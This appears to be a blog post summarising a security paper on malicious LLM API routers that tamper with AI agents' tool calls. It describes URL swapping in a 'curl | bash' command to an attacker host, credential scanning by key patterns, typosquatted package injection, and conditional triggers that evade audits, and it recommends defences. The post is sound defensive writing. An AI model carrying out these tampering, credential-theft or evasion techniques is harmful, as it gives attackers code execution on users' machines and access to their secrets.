UCSB published a paper yesterday called “Your Agent Is Mine” (arXiv:2604.08407). The researchers purchased 28 paid LLM API routers from Taobao, Xianyu, and Shopify, collected 400 more free routers from public communities, then systematically tested whether any of them would tamper with the tool calls in their responses.
Results: 9 routers were actively injecting malicious code. One paid, eight free. Seventeen routers touched the AWS honeypot credentials the researchers planted in their requests. One went ahead and transferred ETH from the researchers’ private key.
Not theoretical. Real money spent, real products tested.
If you’re using Claude Code, Codex, Cursor, or any AI agent with tool calling capabilities, and those agents’ API requests pass through a middle layer you don’t fully trust, a proxy, a relay, your company’s internal API gateway, then this paper is about you.
Here’s how tool calls work: the LLM returns a block of JSON telling the client “execute this command.” The client receives the JSON and runs it on the local machine. The problem is that between the model outputting that JSON and the client receiving it, every router in between can see and modify it. There is no cryptographic mechanism guaranteeing that the JSON the client receives matches what the model actually output.
Specifically, if your AI agent wants to execute
curl -sSL https://legitimate-tool.com/install.sh | bash, a
router in the middle can swap the URL to
https://attacker.com/pwn.sh. Your agent will execute the
tampered command without hesitation, because the JSON format is valid,
the tool name is unchanged, the parameter structure is unchanged. From
the agent’s perspective, everything looks fine.
This man-in-the-middle attack doesn’t require breaking TLS or forging certificates, because you voluntarily configured the man-in-the-middle as your API endpoint. That’s the most ironic part of the whole thing.
An LLM API router is essentially an application-layer reverse proxy. Its job: receive your request, parse the JSON, transform the format if needed, forward it to the upstream model provider, then return the response to you. To do this work, it must be able to read everything you send, your prompt, system prompt, tool definitions, API key, and everything the model returns, tool call arguments, model output.
A normal router reads and forwards. A malicious router can read and then modify tool call parameters, log your credentials, replace package names in install commands. The difference between these two behaviors is completely invisible at the traffic level.
This architectural flaw is not newly discovered. The March 2026 incident where LiteLLM was injected with malicious code via dependency confusion (Trend Micro detailed analysis) already proved that the routing layer is a high-value attack target. LiteLLM has over 240 million Docker Hub downloads, and once compromised, every deployment using it was exposed. Claude Code itself was the one that discovered that malicious package (r/ClaudeCode discussion), an AI agent discovering a supply chain attack on agent infrastructure. That detail alone is worth pondering.
But the LiteLLM incident was a legitimate project getting hacked. This paper tests a more insidious problem: routers that were malicious from day one.
In the Chinese market, the scale of this problem is particularly large. Due to restrictions on directly accessing OpenAI/Anthropic APIs, a massive API proxy ecosystem has grown on Taobao, Xianyu, and open source projects. One API (GitHub 31.7k stars) and its fork New API (GitHub 26k stars) serve as the underlying templates, with thousands of sellers deploying proxy services based on these templates and selling API credits. A survey cited in the paper shows that some Taobao sellers have accumulated over 30,000 repeat purchases. These sellers are anonymous, their operations are unregulated, and when something goes wrong, there’s nobody to hold accountable.
The paper defines a clear attack taxonomy. Two core attacks, two evasion variants.
Payload injection (AC-1) is the most direct. The
router receives the tool call returned by the model, modifies the
parameters, and sends the modified version to the client. The
curl | bash URL swap above is a textbook example. A single
modification is enough to achieve arbitrary code execution on the client
machine.
Credential theft (AC-2) is more stealthy. The router
changes nothing. It passively scans the plaintext traffic passing
through it for key patterns, OpenAI keys (sk-...), AWS keys
(AKIA...), GitHub PATs (ghp_...), Ethereum
private keys (0x...), PEM certificates, and exfiltrates
them asynchronously. Since the router already needs to read this data to
perform forwarding, this behavior is completely invisible at the traffic
level.
Dependency injection (AC-1.a) is a more refined
variant of payload injection. Instead of replacing a URL (which can be
blocked by domain whitelists), it replaces the package name in an
install command. For example, pip install requests becomes
pip install reqeusts, a malicious package pre-registered on
PyPI with a single-letter difference. The rewritten command installs
from the same trusted repository, so domain whitelists can’t catch it.
And once the malicious package is installed, it persists in the local
cache. Even if you stop using that malicious router, the backdoor is
already planted.
Conditional delivery (AC-1.b) is the most unsettling. The router behaves perfectly normally most of the time, only injecting malicious payloads under specific conditions. The trigger conditions discovered during testing include: activating only after 50 calls (to evade short-term audits), injecting only in sessions where YOLO mode is detected (tool execution auto-approved, no human confirmation needed), and targeting only projects in specific programming languages (Rust, Go). This means that even if you test a router 10, 20, or 30 times and everything looks fine, you still can’t prove it’s safe. A limited number of black-box audits is fundamentally insufficient against conditional delivery.
The test results from 428 routers are only part of the paper. More interesting are two poisoning experiments that answer a more fundamental question: are routers that appear normal actually safe?
The first experiment: the researchers deliberately leaked an OpenAI key they controlled on Chinese forums and WeChat/Telegram groups. This single key was used to generate 100 million GPT-5.4 tokens and triggered over 7 Codex sessions. A normally functioning router that obtains a leaked key will share it among its users. And all traffic passing through that router, prompts, tool calls, credentials, is visible in plaintext to the router operator.
The second experiment: the researchers deployed 20 weakly configured decoy routers. These decoys received tens of thousands of unauthorized access attempts from 147 IPs, processed 2 billion tokens, and exposed approximately 13GB of downstream traffic. Within that traffic, the researchers found 99 credentials leaked across 440 Codex sessions, involving 398 different projects or hosts. Of those 440 sessions, 401 were already running in YOLO mode. In other words, tool execution was auto-approved. The attacker didn’t even need advanced techniques like conditional delivery; the simplest payload injection was enough.
These two experiments reveal a problem more severe than the 9/428 figure. 9/428 measures the proportion of routers that were malicious from the start. The poisoning experiments measure the probability that a normal router gets pulled into the attack surface because it uses leaked keys or forwards traffic to weakly configured nodes. The latter’s blast radius is far larger than the former, because it means that even if you pick a router that seems normal, if the upstream key it uses is leaked, or if the next hop it forwards to is malicious, you’re exposed all the same.
The paper evaluates three client-side defenses that can be deployed today.
A fail-closed policy gateway performs deterministic checks on the arguments of high-risk tools (Bash, shell_command) and blocked all payload injection and dependency injection samples at a 1% false positive rate. But if the attacker uses whitelisted domains or pre-deployed local payloads, this gateway can be bypassed 100% of the time.
Response-side anomaly detection flags suspicious modifications by analyzing statistical features of tool_call arguments, catching 89% of payload injection samples at a 6.7% false positive rate, though its effectiveness drops significantly against defense-aware attackers.
Append-only transparent logging doesn’t prevent attacks but records the full content of every tool_call for post-hoc forensics, with a storage cost of approximately 1.26KB per entry.
All three approaches can only mitigate, not eliminate the problem. The root cause is that the client cannot prove the router preserved the original response from the upstream provider. The paper’s authors argue that the long-term solution is provider-side cryptographically signed response envelopes, similar to DKIM signatures for email, letting clients verify that the tool call JSON they received genuinely came from the upstream model. No provider has implemented this mechanism yet.
Call provider APIs directly. OpenAI, Anthropic, and Google all have official SDKs. Configure once and you’re done. If you must use a router due to network or cost constraints, choose branded services with a clear corporate entity, a privacy policy, and security documentation (such as OpenRouter or ZenMux), rather than anonymous sellers on Taobao or Telegram. Branded services are cheap because of volume purchasing and operational efficiency. Anonymous sellers are cheap only because of cost cuts you don’t understand.
Turn off your agent’s YOLO mode and auto tool approval. The paper’s data shows 401 out of 440 exposed sessions were running in YOLO mode. Auto approval amounts to handing over execution authority unconditionally, and the middle layer’s whole requirement is exactly that execution authority.
Enable sandboxing for the AI coding tools you use. Claude Code supports OS-level sandboxing (bubblewrap on Linux, Seatbelt on macOS), and Codex supports sandboxed VMs. Sandboxing can’t prevent tool calls from being tampered with, but it limits the damage radius of tampered commands.
Migrate all keys accessible to your AI tools into a secrets manager.
AI coding tool session logs record everything the tool reads, including
credentials in .zshrc, .npmrc, and
.env files. If those credentials are intercepted by a
middle layer, the consequences go far beyond an API bill. It’s a system
boundary probe, a hijacking of distribution channels, and the collapse
of your entire credential ecosystem.
This paper was submitted to ACM CCS 2026 (CyberSecurityNews coverage), with authors from UCSB, UCSD, Fuzzland, and World Liberty Financial. Its value lies not in revealing some unknown vulnerability, but in being the first to use real-world test data to quantify a risk that many people suspected existed but couldn’t pinpoint the magnitude of.
Two methodological caveats are worth noting when interpreting the numbers. First, all 428 routers were sourced from public gray markets, paid sellers on Taobao, Xianyu, and Shopify, and free routers collected from public communities. This is a convenience sample from the population most likely to be problematic, not a representative draw from the entire router ecosystem. The 9/428 malicious rate tells you the gray market is risky; it does not directly generalize to enterprise deployments or reputable branded services. The paid subsample is only 28 routers (one malicious), which is statistically unstable. Second, the definition of “17 routers touched canary credentials” means that credentials passing through a router later produced attributable AWS API activity. That doesn’t necessarily mean the router operator actively stole the credentials, in a multi-hop routing chain, any hop could be the leak point, and automated credential scanners or compromised downstream infrastructure could trigger the same signal. The ETH drain event proves the key was abused, but in a multi-hop chain, it’s similarly difficult to attribute with high confidence to the specific router being tested. The paper itself acknowledges these limitations, including finite black-box probing and the inability to cover all potential trigger conditions.
The poisoning experiments provide evidence from a different angle: even if you pick a router that appears normal, if the upstream key it uses is leaked, or if the next hop it forwards to is malicious, you’re exposed all the same. From this perspective, the line between malicious and normal is blurrier than the 9/428 figure alone would suggest.
The core problem is an architectural integrity gap: none of the major LLM providers currently offer end-to-end cryptographic signing for tool call responses. As long as this gap exists, any agent call passing through a middle layer can be silently tampered with, and client-side detection can always be bypassed by a smarter attacker. Until response integrity is implemented on the provider side, the most practical approach is to minimize the number of middle layers, maintain verifiability for each layer, and assume that any middle layer you can’t audit is reading all your traffic.